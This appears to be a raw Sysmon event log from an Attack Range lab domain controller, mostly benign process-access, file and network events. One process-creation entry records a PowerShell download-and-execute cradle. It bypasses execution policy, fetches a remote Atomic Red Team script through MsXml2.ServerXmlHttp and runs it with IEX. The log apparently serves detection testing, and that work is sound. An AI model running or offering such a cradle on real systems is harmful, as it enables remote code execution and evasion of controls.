14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203519Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203518Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203517Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203516Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203515Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.673{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203514Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203513Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.659{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203512Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.565{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203511Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.315{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203510Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.315{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203509Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.284{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203508Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.284{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203507Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.268{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB292DC3E2ACF2535D4792BAC65E437,SHA256=AD2E490429BF2EB7056D36A6FDF32C70C3CB2CFFC782084B37F495BC69F91FFA,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000002203506Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:08:02.268{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764\PSHost.132593404821979362.4764.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203505Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.252{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t4z50jhs.jbs.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203504Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.252{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yo5inkmy.g0r.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203503Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.845{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60710-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203502Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.845{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60710-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203501Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.842{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60709-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002203500Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.842{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60709-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local445microsoft-ds 11241100x80000000000000002203499Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.237{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yo5inkmy.g0r.ps12021-03-04 14:08:02.237 23542300x80000000000000002203498Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4A12BA6F713B252ADB57F7AD5A94DA7D,SHA256=96FA9B300C680041586936789F77BB83F0645998A38759457781118576A9B71E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203497Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203496Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4C4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203495Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203494Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203493Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203492Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203491Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4C4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203490Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.205{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9C2-6040-4C4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203489Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.206{5ABCFE62-E9C2-6040-4C4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002203488Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 